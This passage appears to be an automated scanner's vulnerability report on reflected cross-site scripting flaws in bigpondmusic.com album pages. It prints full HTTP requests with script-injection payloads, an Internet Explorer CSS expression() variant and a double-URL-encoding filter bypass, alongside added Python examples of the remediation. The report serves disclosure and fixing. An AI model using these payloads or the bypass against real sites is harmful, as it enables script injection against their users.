This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/cheryl-cole/promise-this2?9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Cheryl Cole - Promise This -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/cheryl-cole/promise-this2?9888f"style="x:expression(alert(1))"97f64925c9b=1" />
...[SNIP]...

2.38. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5 was submitted in the REST URL parameter 1. This input was echoed as 5f944"><script>alert(1)</script>a5d020ae3d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
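The double-decode bypass described above, as an added worked example (not code from the original report or from the site being tested): a blacklist that runs on the value as received, followed by a custom second URL-decode, lets %253c through while a single-encoded %3c is caught; the hardened variants canonicalise before validating and HTML-encode on output. The blocked character set, the parentUrl rendering helper and the pipeline names are assumptions for illustration.

```python
import html
import urllib.parse
from typing import Optional

# Path segment exactly as it appears in the report's request line. REST URL
# parameter 1 is the "album" segment, so the payload is appended to it.
RAW_SEGMENT = "5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5"

# Characters the report says the application tries to block (assumed set).
BLOCKED = frozenset('<>"')


def server_decode(raw_segment: str) -> str:
    """The single URL-decode the web server applies before the application sees the value.
    %2522 becomes %22 and %253c becomes %3c: still harmless-looking percent sequences."""
    return urllib.parse.unquote(raw_segment)


def contains_blocked(value: str) -> bool:
    """Blacklist check of the kind the report describes."""
    return any(ch in BLOCKED for ch in value)


def render_parent_url(segment: str) -> str:
    """Hypothetical sink modelled on the page's parentUrl hidden input."""
    return ('<input type="hidden" name="parentUrl" '
            f'value="http://bigpondmusic.com/album{segment}/crowded-house/..." />')


def vulnerable_pipeline(segment: str) -> Optional[str]:
    """Validates the value as received, then URL-decodes it a second time before rendering.
    The second decode turns %3c back into < after the filter has already run."""
    if contains_blocked(segment):
        return None                                # filter rejects the request
    canonical = urllib.parse.unquote(segment)      # custom second decode
    return render_parent_url(canonical)            # raw reflection into the attribute


def fixed_pipeline(segment: str) -> Optional[str]:
    """Canonicalise first, validate the canonical form, and HTML-encode on output."""
    canonical = urllib.parse.unquote(segment)
    if contains_blocked(canonical):
        return None
    return render_parent_url(html.escape(canonical, quote=True))


def encode_only_pipeline(segment: str) -> str:
    """No blacklist at all: output encoding alone keeps the value inside the attribute."""
    canonical = urllib.parse.unquote(segment)
    return render_parent_url(html.escape(canonical, quote=True))


if __name__ == "__main__":
    seen_by_app = server_decode(RAW_SEGMENT)
    print("application receives:", seen_by_app)
    print("vulnerable:", vulnerable_pipeline(seen_by_app))
    print("fixed:     ", fixed_pipeline(seen_by_app))
    print("encoded:   ", encode_only_pipeline(seen_by_app))
```

Dropping the second decode entirely removes this particular bypass, but encode_only_pipeline is the part that actually matters: the response is a 404 page, and the reflection happens there regardless of what the blacklist thinks of the input, so the attribute encoding on output is the control that holds when the filter is wrong.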

Request

GET /album5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album5f944"><script>alert(1)</script>a5d020ae3d5/crowded-house/the-very-very-best-of-crowded-house" />
...[SNIP]...

2.39. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fac8e'%3b464820d9d25 was submitted in the REST URL parameter 1. This input was echoed as fac8e';464820d9d25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
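Both sinks this report keeps returning to, the parentUrl hidden-input attribute that reflects the "style="x:expression(alert(1))" payloads and the single-quoted s.channel string that the payload above terminates, need context-specific output encoding. The following added example (not the site's code; the template functions, the PATH constant and the names are assumed) shows each sink in its vulnerable form beside a hardened form: HTML-attribute encoding for the attribute, and a JavaScript string literal built with json.dumps plus escaping of <, > and & so a value can never close the literal or the enclosing <script> element.

```python
import html
import json

# Reflected values from the report's request lines, as the application sees
# them after the server's URL-decode (constructed from the page, not captured).
QUERY_STRING = '9888f"style="x:expression(alert(1))"97f64925c9b=1'  # parameter-name payload
SEGMENT = "albumfac8e';464820d9d25"                                  # REST URL parameter 1 payload
PATH = "http://bigpondmusic.com/album/cheryl-cole/promise-this2"    # assumed page URL


def attribute_value(value: str) -> str:
    """Encode for a double-quoted HTML attribute: &, <, >, " and ' become entities."""
    return html.escape(value, quote=True)


def js_string_literal(value: str) -> str:
    """Return a double-quoted JavaScript string literal that is safe inside a <script> block.

    json.dumps escapes quotes, backslashes, control characters and (with the default
    ensure_ascii=True) the U+2028/U+2029 line terminators. The extra replacements
    keep </script> from closing the block, because the HTML parser tokenises the
    script body before the JavaScript engine ever sees the literal.
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def decodes_back(value: str) -> bool:
    """Escaping must be lossless: a JSON parser (same grammar as a JS string literal) recovers the value."""
    return json.loads(js_string_literal(value)) == value


# Sink 1: the parentUrl hidden input (HTML attribute context).
def vulnerable_parent_url(query_string: str) -> str:
    return f'<input type="hidden" name="parentUrl" value="{PATH}?{query_string}" />'


def fixed_parent_url(query_string: str) -> str:
    return f'<input type="hidden" name="parentUrl" value="{attribute_value(PATH + "?" + query_string)}" />'


# Sink 2: the s.channel assignment inside an inline <script> (JS string context).
def vulnerable_channel(segment: str) -> str:
    return f"s.channel = '{segment}';"


def fixed_channel(segment: str) -> str:
    return f"s.channel = {js_string_literal(segment)};"


if __name__ == "__main__":
    print(vulnerable_parent_url(QUERY_STRING))
    print(fixed_parent_url(QUERY_STRING))
    print(vulnerable_channel(SEGMENT))
    print(fixed_channel(SEGMENT))
```

The quote breakout in the attribute sink is browser-independent; only the expression() payload the scanner chose is Internet Explorer specific. For the script sink the report found string termination but no full PoC, and that is still enough to require the fix: once the literal can be closed, what follows is a matter of which characters survive, not whether the context is broken.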

Request

GET /albumfac8e'%3b464820d9d25/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumfac8e';464820d9d25';
   s.prop4 = 'crowded-house';
   s.prop5 = 'the-very-very-best-of-crowded-house';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|'
...[SNIP]...

2.40. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b was submitted in the h parameter. This input was echoed as 54cb1"style="x:expression(alert(1))"deab3ae0b1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 150486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Crowded House - The Very Ver
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style="x:expression(alert(1))"deab3ae0b1b" />
...[SNIP]...

2.41. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/crowded-house/the-very-very-best-of-crowded-house

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82f6a"style="x:expression(alert(1))"0184eb381c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 150546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Crowded House - The Very Ver
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style="x:expression(alert(1))"0184eb381c7=1" />
...[SNIP]...

2.42. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4 was submitted in the REST URL parameter 1. This input was echoed as 7c305"><script>alert(1)</script>a89f56eddf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4/enrique-iglesias/euphoria3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:23:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album7c305"><script>alert(1)</script>a89f56eddf4/enrique-iglesias/euphoria3" />
...[SNIP]...

2.43. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 397dc'%3b4e76ceeb81a was submitted in the REST URL parameter 1. This input was echoed as 397dc';4e76ceeb81a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album397dc'%3b4e76ceeb81a/enrique-iglesias/euphoria3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:23:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87862


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album397dc';4e76ceeb81a';
   s.prop4 = 'enrique-iglesias';
   s.prop5 = 'euphoria3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop
...[SNIP]...

2.44. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e was submitted in the h parameter. This input was echoed as f169e"style="x:expression(alert(1))"07c1ed7cd2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/enrique-iglesias/euphoria3?h=670210759f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124160


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Enrique Iglesias - Euphoria
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/enrique-iglesias/euphoria3?h=670210759f169e"style="x:expression(alert(1))"07c1ed7cd2e" />
...[SNIP]...

2.45. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/enrique-iglesias/euphoria3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 330e0"style%3d"x%3aexpression(alert(1))"04885151f99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 330e0"style="x:expression(alert(1))"04885151f99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/enrique-iglesias/euphoria3?330e0"style%3d"x%3aexpression(alert(1))"04885151f99=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124781


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Enrique Iglesias - Euphoria
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/enrique-iglesias/euphoria3?330e0"style="x:expression(alert(1))"04885151f99=1" />
...[SNIP]...

2.46. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b was submitted in the REST URL parameter 1. This input was echoed as 4e55c"><script>alert(1)</script>9e81b9f299b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b/far-east-movement/like-a-g6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album4e55c"><script>alert(1)</script>9e81b9f299b/far-east-movement/like-a-g6" />
...[SNIP]...

2.47. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
